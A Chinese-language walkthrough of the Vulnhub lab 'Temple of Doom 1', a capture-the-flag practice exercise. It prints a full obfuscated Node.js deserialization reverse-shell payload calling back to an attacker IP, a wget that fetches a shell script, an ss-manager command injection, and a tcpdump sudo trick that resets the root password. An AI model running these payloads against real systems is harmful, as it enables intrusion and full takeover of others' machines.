Vulnhub Challenging: Temple of doom 1

思路

端口扫描, 整理思路
666端口, node rce
ss-manager, 反弹shell
tcpdump, get root

关键点

node反序列化导致RCE
ss-manager任意命令执行
tcpdump以root权限执行提权

端口扫描, 整理思路

拿到靶机ip之后，先扫描tcp的全端口确定渗透的方向

1	$ nmap -sS -Pn -p- -A 10.l29.10.51

nmap
22端口, OpenSSH 7.7 无问题, 只能爆破, 忽略
666端口, Node.js WEB前端框架, 各种漏洞优先考虑

666端口, node rce

看到是node的WEB框架之后，第一直觉是找前端js中包含的接口, 尝试从接口中找到突破口; 结果发现没有js文件且第二次访问时爆json反序列化出错异常信息; 反序列化？RCE？
由于之前学习过反序列化相关文章, 因此直接拿出nodejsshell.py生成RCE payload

1	$ python nodejsshell.py 10.129.10.62 4444

将得到如下payload:

eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,50,57,46,49,48,46,54,50,34,59,10,80,79,82,84,61,34,52,52,52,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

用payload构造RCE, 写入cookie中执行, 获得反弹shell

{"rce":"_$$ND_FUNC$$_function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,50,57,46,49,48,46,54,50,34,59,10,80,79,82,84,61,34,52,52,52,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

node rce

其中, _$$ND_FUNC$$_是node serialize.js中的内建函数标志, 关于node rce的原理分析请看exploit-db的paper分析。

ss-manager, 反弹shell

进入nodeadmin权限的shell后, 上传LinEnum.sh文件并收集可利用的信息, 结果并没有发现什么有用的信息(看来得增加一波功能了), 通过LinEnum.sh的反馈, 了解到内核、操作系统、计划任务提权都不可用
既然内核、计划任务、sudo配置无漏洞, 开始考虑服务、文件、错误配置, 通过ps -aux | grep ""发现fireman用户运行了ss-manager进程, 此时开始考虑先切换到其他用户的账号下, 然后尝试getshell

直接在google、searchsploit、exploit-db上搜索shadowsocks、ss-manager, 然后在exploit-db中用content搜索ss-manager时发现shadowsocks使用的libdev 3.1.0版本中存在本地命令执行漏洞

# 下载反弹shell
$ wget http://10.129.10.62:8080/shell.py -O /tmp/shell.py

# 执行shell.py
$ nc -u 127.0.0.1 8839
add: {"server_port":8005, "password":"test", "method":"|| python /tmp/shell.py ||"}

成功拿到fireman权限的反弹shell。
tips:

ss-manager的功能: 接收ss配置, 然后调用ss-server根据配置运行对应的进程, 因此执行完上面的payload后, 会以fireman权限启动一个进程：sh -c ss-server -m || python /tmp/shell.py || --manager-address 127.0.0.1:8839 -f /home/fireman/.shadowsoks/.shadowsocks_8005.pid -c /home/fireman/.shadowsocks/.shadowsocks_8005.conf -t 60 -s 0.0.0.0 --reuse-port;
如果在反弹的shell中执行一些阻塞进程的任务时, 将导致python /tmp/shell.py无法退出, 然后无法创建新的进程, 只能重启或以高权限杀死对应进程方可继续创建ss-server进程;

tcpdump, get root

拿到fireman的shell后, 依旧是运行LinEnum.sh, 发现sudo -l的结果中有tcpdump命令, 尝试tcpdump获取shell

# 写修改密码的shell文件
$ echo '(echo "owefsad123";sleep 1;echo "owefsad123")|passwd>/dev/null' > /tmp/.test
# 增加文件可执行那个权限, 如果不指定权限会出现权限不足的错误
$ chmod +x /tmp/.test
# tcpdump执行命令获取root密码
$ sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

成功执行命令, 修改了root用户的密码
tcp dump

切换到root用户搜索靶机的flag
su root

搜索flag文件

1	$ find / -name "flag*" -type f 2>/dev/null

读取flag
read flag

知识点

node serialize.js 反序列化 rce
shadowsocks libdev 3.1.0 命令执行
tcpdump 4.0.0之后版本可执行命令导致提权(sudoers配置错误)

思路

关键点

端口扫描, 整理思路

666端口, node rce

ss-manager, 反弹shell

tcpdump, get root

知识点

参考文章